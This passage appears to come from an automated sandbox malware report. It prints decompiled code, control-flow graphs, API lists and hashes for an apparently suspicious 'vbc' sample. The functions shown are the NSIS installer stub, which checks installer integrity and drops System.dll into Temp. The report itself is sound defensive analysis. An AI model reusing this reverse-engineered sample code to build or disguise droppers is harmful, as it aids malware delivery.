                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                    • API String ID: 1975747703-2633365883
                    • Opcode ID: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                    • Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
                    • Opcode Fuzzy Hash: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                    • Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40600a 378 4030d7-403105 call 40651a call 405e35 call 40651a GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034ac 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034c2 call 4034ac 394->397 398 403227-403251 GlobalAlloc call 4034c2 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 406 403143-403157 call 405fc5 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 424 403159-403160 406->424 411 4031c3-4031ca call 403019 407->411 407->412 411->412 417 4031e0-4031e8 412->417 418 4031d3-4031dd call 4069d4 412->418 417->390 425 4031ee 417->425 418->417 421->395 421->398 424->412 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->412 432 40316b-403172 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fc5 431->433 432->412 434 403174-40317b 432->434 438 4032ab 433->438 434->412 435 40317d-40319d 434->435 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->425 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                    C-Code - Quality: 80%
                    			E0040307D(void* __eflags, signed int _a4) {
                    				DWORD* _v8;
                    				DWORD* _v12;
                    				void* _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				signed int _t50;
                    				void* _t53;
                    				void* _t57;
                    				intOrPtr* _t59;
                    				long _t60;
                    				signed int _t65;
                    				signed int _t70;
                    				signed int _t71;
                    				signed int _t77;
                    				intOrPtr _t80;
                    				long _t82;
                    				signed int _t85;
                    				signed int _t87;
                    				void* _t89;
                    				signed int _t90;
                    				signed int _t93;
                    				void* _t94;
                    
                    				_t82 = 0;
                    				_v12 = 0;
                    				_v8 = 0;
                    				 *0x7a8a6c = GetTickCount() + 0x3e8;
                    				GetModuleFileNameW(0, 0x7b6800, 0x400);
                    				_t89 = E0040600A(0x7b6800, 0x80000000, 3);
                    				_v16 = _t89;
                    				 *0x40a018 = _t89;
                    				if(_t89 == 0xffffffff) {
                    					return L"Error launching installer";
                    				}
                    				E0040651A(0x7b4800, 0x7b6800);
                    				E0040651A(0x7b7000, E00405E35(0x7b4800));
                    				_t50 = GetFileSize(_t89, 0);
                    				__eflags = _t50;
                    				 *0x79f704 = _t50;
                    				_t93 = _t50;
                    				if(_t50 <= 0) {
                    					L24:
                    					E00403019(1);
                    					__eflags =  *0x7a8a74 - _t82;
                    					if( *0x7a8a74 == _t82) {
                    						goto L29;
                    					}
                    					__eflags = _v8 - _t82;
                    					if(_v8 == _t82) {
                    						L28:
                    						_t34 =  &_v24; // 0x40385a
                    						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                    						_t94 = _t53;
                    						E004034C2( *0x7a8a74 + 0x1c);
                    						_t35 =  &_v24; // 0x40385a
                    						_push( *_t35);
                    						_push(_t94);
                    						_push(_t82);
                    						_push(0xffffffff); // executed
                    						_t57 = E004032B4(); // executed
                    						__eflags = _t57 - _v24;
                    						if(_t57 == _v24) {
                    							__eflags = _v44 & 0x00000001;
                    							 *0x7a8a70 = _t94;
                    							 *0x7a8a78 =  *_t94;
                    							if((_v44 & 0x00000001) != 0) {
                    								 *0x7a8a7c =  *0x7a8a7c + 1;
                    								__eflags =  *0x7a8a7c;
                    							}
                    							_t40 = _t94 + 0x44; // 0x44
                    							_t59 = _t40;
                    							_t85 = 8;
                    							do {
                    								_t59 = _t59 - 8;
                    								 *_t59 =  *_t59 + _t94;
                    								_t85 = _t85 - 1;
                    								__eflags = _t85;
                    							} while (_t85 != 0);
                    							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                    							 *(_t94 + 0x3c) = _t60;
                    							E00405FC5(0x7a8a80, _t94 + 4, 0x40);
                    							__eflags = 0;
                    							return 0;
                    						}
                    						goto L29;
                    					}
                    					E004034C2( *0x7936f8);
                    					_t65 = E004034AC( &_a4, 4);
                    					__eflags = _t65;
                    					if(_t65 == 0) {
                    						goto L29;
                    					}
                    					__eflags = _v12 - _a4;
                    					if(_v12 != _a4) {
                    						goto L29;
                    					}
                    					goto L28;
                    				} else {
                    					do {
                    						_t90 = _t93;
                    						asm("sbb eax, eax");
                    						_t70 = ( ~( *0x7a8a74) & 0x00007e00) + 0x200;
                    						__eflags = _t93 - _t70;
                    						if(_t93 >= _t70) {
                    							_t90 = _t70;
                    						}
                    						_t71 = E004034AC(0x78b6f8, _t90);
                    						__eflags = _t71;
                    						if(_t71 == 0) {
                    							E00403019(1);
                    							L29:
                    							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                    						}
                    						__eflags =  *0x7a8a74;
                    						if( *0x7a8a74 != 0) {
                    							__eflags = _a4 & 0x00000002;
                    							if((_a4 & 0x00000002) == 0) {
                    								E00403019(0);
                    							}
                    							goto L20;
                    						}
                    						E00405FC5( &_v44, 0x78b6f8, 0x1c);
                    						_t77 = _v44;
                    						__eflags = _t77 & 0xfffffff0;
                    						if((_t77 & 0xfffffff0) != 0) {
                    							goto L20;
                    						}
                    						__eflags = _v40 - 0xdeadbeef;
                    						if(_v40 != 0xdeadbeef) {
                    							goto L20;
                    						}
                    						__eflags = _v28 - 0x74736e49;
                    						if(_v28 != 0x74736e49) {
                    							goto L20;
                    						}
                    						__eflags = _v32 - 0x74666f73;
                    						if(_v32 != 0x74666f73) {
                    							goto L20;
                    						}
                    						__eflags = _v36 - 0x6c6c754e;
                    						if(_v36 != 0x6c6c754e) {
                    							goto L20;
                    						}
                    						_a4 = _a4 | _t77;
                    						_t87 =  *0x7936f8; // 0x4fcbb
                    						 *0x7a8b00 =  *0x7a8b00 | _a4 & 0x00000002;
                    						_t80 = _v20;
                    						__eflags = _t80 - _t93;
                    						 *0x7a8a74 = _t87;
                    						if(_t80 > _t93) {
                    							goto L29;
                    						}
                    						__eflags = _a4 & 0x00000008;
                    						if((_a4 & 0x00000008) != 0) {
                    							L16:
                    							_v8 = _v8 + 1;
                    							_t93 = _t80 - 4;
                    							__eflags = _t90 - _t93;
                    							if(_t90 > _t93) {
                    								_t90 = _t93;
                    							}
                    							goto L20;
                    						}
                    						__eflags = _a4 & 0x00000004;
                    						if((_a4 & 0x00000004) != 0) {
                    							break;
                    						}
                    						goto L16;
                    						L20:
                    						__eflags = _t93 -  *0x79f704; // 0x4fcbf
                    						if(__eflags < 0) {
                    							_v12 = E004069D4(_v12, 0x78b6f8, _t90);
                    						}
                    						 *0x7936f8 =  *0x7936f8 + _t90;
                    						_t93 = _t93 - _t90;
                    						__eflags = _t93;
                    					} while (_t93 != 0);
                    					_t82 = 0;
                    					__eflags = 0;
                    					goto L24;
                    				}
                    			}






























                    0x00403085
                    0x00403088
                    0x0040308b
                    0x004030a5
                    0x004030aa
                    0x004030bd
                    0x004030c2
                    0x004030c5
                    0x004030cb
                    0x00000000
                    0x004030cd
                    0x004030de
                    0x004030ef
                    0x004030f6
                    0x004030fc
                    0x004030fe
                    0x00403103
                    0x00403105
                    0x004031f0
                    0x004031f2
                    0x004031f7
                    0x004031fe
                    0x00000000
                    0x00000000
                    0x00403200
                    0x00403203
                    0x00403227
                    0x00403227
                    0x0040322c
                    0x00403232
                    0x0040323d
                    0x00403242
                    0x00403242
                    0x00403245
                    0x00403246
                    0x00403247
                    0x00403249
                    0x0040324e
                    0x00403251
                    0x00403264
                    0x00403268
                    0x00403270
                    0x00403275
                    0x00403277
                    0x00403277
                    0x00403277
                    0x0040327f
                    0x0040327f
                    0x00403282
                    0x00403283
                    0x00403283
                    0x00403286
                    0x00403288
                    0x00403288
                    0x00403288
                    0x00403292
                    0x00403298
                    0x004032a6
                    0x004032ab
                    0x00000000
                    0x004032ab
                    0x00000000
                    0x00403251
                    0x0040320b
                    0x00403216
                    0x0040321b
                    0x0040321d
                    0x00000000
                    0x00000000
                    0x00403222
                    0x00403225
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040310b
                    0x00403110
                    0x00403115
                    0x00403119
                    0x00403120
                    0x00403125
                    0x00403127
                    0x00403129
                    0x00403129
                    0x0040312d
                    0x00403132
                    0x00403134
                    0x0040325c
                    0x00403253
                    0x00000000
                    0x00403253
                    0x0040313a
                    0x00403141
                    0x004031bd
                    0x004031c1
                    0x004031c5
                    0x004031ca
                    0x00000000
                    0x004031c1
                    0x0040314a
                    0x0040314f
                    0x00403152
                    0x00403157
                    0x00000000
                    0x00000000
                    0x00403159
                    0x00403160
                    0x00000000
                    0x00000000
                    0x00403162
                    0x00403169
                    0x00000000
                    0x00000000
                    0x0040316b
                    0x00403172
                    0x00000000
                    0x00000000
                    0x00403174
                    0x0040317b
                    0x00000000
                    0x00000000
                    0x0040317d
                    0x00403183
                    0x0040318c
                    0x00403192
                    0x00403195
                    0x00403197
                    0x0040319d
                    0x00000000
                    0x00000000
                    0x004031a3
                    0x004031a7
                    0x004031af
                    0x004031af
                    0x004031b2
                    0x004031b5
                    0x004031b7
                    0x004031b9
                    0x004031b9
                    0x00000000
                    0x004031b7
                    0x004031a9
                    0x004031ad
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004031cb
                    0x004031cb
                    0x004031d1
                    0x004031dd
                    0x004031dd
                    0x004031e0
                    0x004031e6
                    0x004031e6
                    0x004031e6
                    0x004031ee
                    0x004031ee
                    0x00000000
                    0x004031ee

                    APIs
                    • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040385A,?), ref: 0040308E
                    • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA
                      • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                      • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
                    • GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C
                    Strings
                    • Inst, xrefs: 00403162
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                    • soft, xrefs: 0040316B
                    • Error launching installer, xrefs: 004030CD
                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                    • Null, xrefs: 00403174
                    • Z8@, xrefs: 00403227, 00403242
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
                    • API String ID: 2803837635-1309756075
                    • Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                    • Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
                    • Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                    • Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 727 40176f-401794 call 402da6 call 405e60 732 401796-40179c call 40651a 727->732 733 40179e-4017b0 call 40651a call 405de9 lstrcatW 727->733 738 4017b5-4017b6 call 4067a1 732->738 733->738 742 4017bb-4017bf 738->742 743 4017c1-4017cb call 406850 742->743 744 4017f2-4017f5 742->744 751 4017dd-4017ef 743->751 752 4017cd-4017db CompareFileTime 743->752 745 4017f7-4017f8 call 405fe5 744->745 746 4017fd-401819 call 40600a 744->746 745->746 754 40181b-40181e 746->754 755 40188d-4018b6 call 40557c call 4032b4 746->755 751->744 752->751 756 401820-40185e call 40651a * 2 call 406557 call 40651a call 405b7a 754->756 757 40186f-401879 call 40557c 754->757 767 4018b8-4018bc 755->767 768 4018be-4018ca SetFileTime 755->768 756->742 789 401864-401865 756->789 769 401882-401888 757->769 767->768 771 4018d0-4018db CloseHandle 767->771 768->771 772 402c33 769->772 775 4018e1-4018e4 771->775 776 402c2a-402c2d 771->776 774 402c35-402c39 772->774 779 4018e6-4018f7 call 406557 lstrcatW 775->779 780 4018f9-4018fc call 406557 775->780 776->772 786 401901-402398 779->786 780->786 790 40239d-4023a2 786->790 791 402398 call 405b7a 786->791 789->769 792 401867-401868 789->792 790->774 791->790 792->757
                    C-Code - Quality: 61%
                    			E0040176F(FILETIME* __ebx, void* __eflags) {
                    				void* __esi;
                    				void* _t35;
                    				void* _t43;
                    				void* _t45;
                    				FILETIME* _t51;
                    				FILETIME* _t64;
                    				void* _t66;
                    				signed int _t72;
                    				FILETIME* _t73;
                    				FILETIME* _t77;
                    				signed int _t79;
                    				WCHAR* _t81;
                    				void* _t83;
                    				void* _t84;
                    				void* _t86;
                    
                    				_t77 = __ebx;
                    				 *(_t86 - 8) = E00402DA6(0x31);
                    				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                    				_t35 = E00405E60( *(_t86 - 8));
                    				_push( *(_t86 - 8));
                    				_t81 = L"Call";
                    				if(_t35 == 0) {
                    					lstrcatW(E00405DE9(E0040651A(_t81, 0x7b4000)), ??);
                    				} else {
                    					E0040651A();
                    				}
                    				E004067A1(_t81);
                    				while(1) {
                    					__eflags =  *(_t86 + 8) - 3;
                    					if( *(_t86 + 8) >= 3) {
                    						_t66 = E00406850(_t81);
                    						_t79 = 0;
                    						__eflags = _t66 - _t77;
                    						if(_t66 != _t77) {
                    							_t73 = _t66 + 0x14;
                    							__eflags = _t73;
                    							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                    						}
                    						asm("sbb eax, eax");
                    						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                    						__eflags = _t72;
                    						 *(_t86 + 8) = _t72;
                    					}
                    					__eflags =  *(_t86 + 8) - _t77;
                    					if( *(_t86 + 8) == _t77) {
                    						E00405FE5(_t81);
                    					}
                    					__eflags =  *(_t86 + 8) - 1;
                    					_t43 = E0040600A(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                    					__eflags = _t43 - 0xffffffff;
                    					 *(_t86 - 0x38) = _t43;
                    					if(_t43 != 0xffffffff) {
                    						break;
                    					}
                    					__eflags =  *(_t86 + 8) - _t77;
                    					if( *(_t86 + 8) != _t77) {
                    						E0040557C(0xffffffe2,  *(_t86 - 8));
                    						__eflags =  *(_t86 + 8) - 2;
                    						if(__eflags == 0) {
                    							 *((intOrPtr*)(_t86 - 4)) = 1;
                    						}
                    						L31:
                    						 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t86 - 4));
                    						__eflags =  *0x7a8ae8;
                    						goto L32;
                    					} else {
                    						E0040651A("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp", _t83);
                    						E0040651A(_t83, _t81);
                    						E00406557(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                    						E0040651A(_t83, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp");
                    						_t64 = E00405B7A("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                    						__eflags = _t64;
                    						if(_t64 == 0) {
                    							continue;
                    						} else {
                    							__eflags = _t64 == 1;
                    							if(_t64 == 1) {
                    								 *0x7a8ae8 =  &( *0x7a8ae8->dwLowDateTime);
                    								L32:
                    								_t51 = 0;
                    								__eflags = 0;
                    							} else {
                    								_push(_t81);
                    								_push(0xfffffffa);
                    								E0040557C();
                    								L29:
                    								_t51 = 0x7fffffff;
                    							}
                    						}
                    					}
                    					L33:
                    					return _t51;
                    				}
                    				E0040557C(0xffffffea,  *(_t86 - 8)); // executed
                    				 *0x7a8b14 =  *0x7a8b14 + 1;
                    				_push(_t77);
                    				_push(_t77);
                    				_push( *(_t86 - 0x38));
                    				_push( *((intOrPtr*)(_t86 - 0x28)));
                    				_t45 = E004032B4(); // executed
                    				 *0x7a8b14 =  *0x7a8b14 - 1;
                    				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                    				_t84 = _t45;
                    				if( *(_t86 - 0x24) != 0xffffffff) {
                    					L22:
                    					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                    				} else {
                    					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                    					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                    						goto L22;
                    					}
                    				}
                    				CloseHandle( *(_t86 - 0x38)); // executed
                    				__eflags = _t84 - _t77;
                    				if(_t84 >= _t77) {
                    					goto L31;
                    				} else {
                    					__eflags = _t84 - 0xfffffffe;
                    					if(_t84 != 0xfffffffe) {
                    						E00406557(_t77, _t81, _t84, _t81, 0xffffffee);
                    					} else {
                    						E00406557(_t77, _t81, _t84, _t81, 0xffffffe9);
                    						lstrcatW(_t81,  *(_t86 - 8));
                    					}
                    					_push(0x200010);
                    					_push(_t81);
                    					E00405B7A();
                    					goto L29;
                    				}
                    				goto L33;
                    			}


















                    0x0040176f
                    0x00401776
                    0x00401782
                    0x00401785
                    0x0040178a
                    0x0040178d
                    0x00401794
                    0x004017b0
                    0x00401796
                    0x00401797
                    0x00401797
                    0x004017b6
                    0x004017bb
                    0x004017bb
                    0x004017bf
                    0x004017c2
                    0x004017c7
                    0x004017c9
                    0x004017cb
                    0x004017d0
                    0x004017d0
                    0x004017db
                    0x004017db
                    0x004017ec
                    0x004017ee
                    0x004017ee
                    0x004017ef
                    0x004017ef
                    0x004017f2
                    0x004017f5
                    0x004017f8
                    0x004017f8
                    0x004017ff
                    0x0040180e
                    0x00401813
                    0x00401816
                    0x00401819
                    0x00000000
                    0x00000000
                    0x0040181b
                    0x0040181e
                    0x00401874
                    0x00401879
                    0x004015b6
                    0x0040292e
                    0x0040292e
                    0x00402c2a
                    0x00402c2d
                    0x00402c2d
                    0x00000000
                    0x00401820
                    0x00401826
                    0x0040182d
                    0x0040183a
                    0x00401845
                    0x0040185b
                    0x0040185b
                    0x0040185e
                    0x00000000
                    0x00401864
                    0x00401864
                    0x00401865
                    0x00401882
                    0x00402c33
                    0x00402c33
                    0x00402c33
                    0x00401867
                    0x00401867
                    0x00401868
                    0x00401493
                    0x0040239d
                    0x0040239d
                    0x0040239d
                    0x00401865
                    0x0040185e
                    0x00402c35
                    0x00402c39
                    0x00402c39
                    0x00401892
                    0x00401897
                    0x0040189d
                    0x0040189e
                    0x0040189f
                    0x004018a2
                    0x004018a5
                    0x004018aa
                    0x004018b0
                    0x004018b4
                    0x004018b6
                    0x004018be
                    0x004018ca
                    0x004018b8
                    0x004018b8
                    0x004018bc
                    0x00000000
                    0x00000000
                    0x004018bc
                    0x004018d3
                    0x004018d9
                    0x004018db
                    0x00000000
                    0x004018e1
                    0x004018e1
                    0x004018e4
                    0x004018fc
                    0x004018e6
                    0x004018e9
                    0x004018f2
                    0x004018f2
                    0x00401901
                    0x00401906
                    0x00402398
                    0x00000000
                    0x00402398
                    0x00000000

                    APIs
                    • lstrcatW.KERNEL32 ref: 004017B0
                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,?,?,00000031), ref: 004017D5
                      • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                      • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                      • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                      • Part of subcall function 0040557C: lstrcatW.KERNEL32 ref: 004055D7
                      • Part of subcall function 0040557C: SetWindowTextW.USER32 ref: 004055E9
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll$Call
                    • API String ID: 1941528284-3429065576
                    • Opcode ID: 12778993b973a10c22c4ece172c34c72592007db8cc4149c3b2bec960c285f91
                    • Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
                    • Opcode Fuzzy Hash: 12778993b973a10c22c4ece172c34c72592007db8cc4149c3b2bec960c285f91
                    • Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 793 4032b4-4032cb 794 4032d4-4032dd 793->794 795 4032cd 793->795 796 4032e6-4032eb 794->796 797 4032df 794->797 795->794 798 4032fb-403308 call 4034ac 796->798 799 4032ed-4032f6 call 4034c2 796->799 797->796 803 40349a 798->803 804 40330e-403312 798->804 799->798 805 40349c-40349d 803->805 806 403445-403447 804->806 807 403318-40333e GetTickCount 804->807 810 4034a5-4034a9 805->810 808 403487-40348a 806->808 809 403449-40344c 806->809 811 4034a2 807->811 812 403344-40334c 807->812 813 40348c 808->813 814 40348f-403498 call 4034ac 808->814 809->811 815 40344e 809->815 811->810 816 403351-40335f call 4034ac 812->816 817 40334e 812->817 813->814 814->803 825 40349f 814->825 819 403451-403457 815->819 816->803 827 403365-40336e 816->827 817->816 822 403459 819->822 823 40345b-403469 call 4034ac 819->823 822->823 823->803 831 40346b-403470 call 4060bc 823->831 825->811 828 403374-403394 call 406a42 827->828 835 40339a-4033ad GetTickCount 828->835 836 40343d-40343f 828->836 834 403475-403477 831->834 837 403441-403443 834->837 838 403479-403483 834->838 839 4033f8-4033fa 835->839 840 4033af-4033b7 835->840 836->805 837->805 838->819 841 403485 838->841 844 403431-403435 839->844 845 4033fc-403400 839->845 842 4033b9-4033bd 840->842 843 4033bf-4033f0 MulDiv wsprintfW call 40557c 840->843 841->811 842->839 842->843 851 4033f5 843->851 844->812 846 40343b 844->846 848 403402-403409 call 4060bc 845->848 849 403417-403422 845->849 846->811 854 40340e-403410 848->854 850 403425-403429 849->850 850->828 853 40342f 850->853 851->839 853->811 854->837 855 403412-403415 854->855 855->850
                    C-Code - Quality: 95%
                    			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                    				signed int _v8;
                    				int _v12;
                    				intOrPtr _v16;
                    				long _v20;
                    				intOrPtr _v24;
                    				short _v152;
                    				void* _t65;
                    				void* _t69;
                    				long _t70;
                    				intOrPtr _t74;
                    				long _t75;
                    				intOrPtr _t76;
                    				void* _t77;
                    				int _t87;
                    				intOrPtr _t91;
                    				intOrPtr _t94;
                    				long _t95;
                    				signed int _t96;
                    				int _t97;
                    				int _t98;
                    				intOrPtr _t99;
                    				void* _t100;
                    				void* _t101;
                    
                    				_t96 = _a16;
                    				_t91 = _a12;
                    				_v12 = _t96;
                    				if(_t91 == 0) {
                    					_v12 = 0x8000;
                    				}
                    				_v8 = _v8 & 0x00000000;
                    				_v16 = _t91;
                    				if(_t91 == 0) {
                    					_v16 = 0x797700;
                    				}
                    				_t62 = _a4;
                    				if(_a4 >= 0) {
                    					E004034C2( *0x7a8ab8 + _t62);
                    				}
                    				if(E004034AC( &_a16, 4) == 0) {
                    					L41:
                    					_push(0xfffffffd);
                    					goto L42;
                    				} else {
                    					if((_a19 & 0x00000080) == 0) {
                    						if(_t91 != 0) {
                    							if(_a16 < _t96) {
                    								_t96 = _a16;
                    							}
                    							if(E004034AC(_t91, _t96) != 0) {
                    								_v8 = _t96;
                    								L44:
                    								return _v8;
                    							} else {
                    								goto L41;
                    							}
                    						}
                    						if(_a16 <= _t91) {
                    							goto L44;
                    						}
                    						_t87 = _v12;
